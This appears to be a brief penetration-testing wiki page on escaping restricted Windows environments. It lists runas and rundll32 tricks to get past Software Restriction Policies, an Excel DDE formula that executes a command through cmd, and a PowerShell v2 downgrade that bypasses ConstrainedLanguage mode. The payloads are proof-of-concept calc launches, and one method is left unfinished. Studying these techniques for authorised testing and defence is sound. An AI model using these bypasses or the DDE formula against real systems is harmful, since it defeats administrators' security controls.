✅ Environments escape

Penetration Testing Wiki

Escape Citrix or cmd.exe disabled by SRP

runas /savecred /user:$USERNAME calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>


I.e.:

rundll32.exe user32.dll,LockWorkStation
start cmd

Escape Excel

Excel command execution through a macro:

=cmd|'/C calc.exe'!__xA1

Escape PowerShell

Powershell evasion inside ConstrainedLanguage mode:

Method 1: Downgrade powershell to v2

powershell.exe -Version 2 -ep bypass -nop

Method 2: runas powershell ?

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.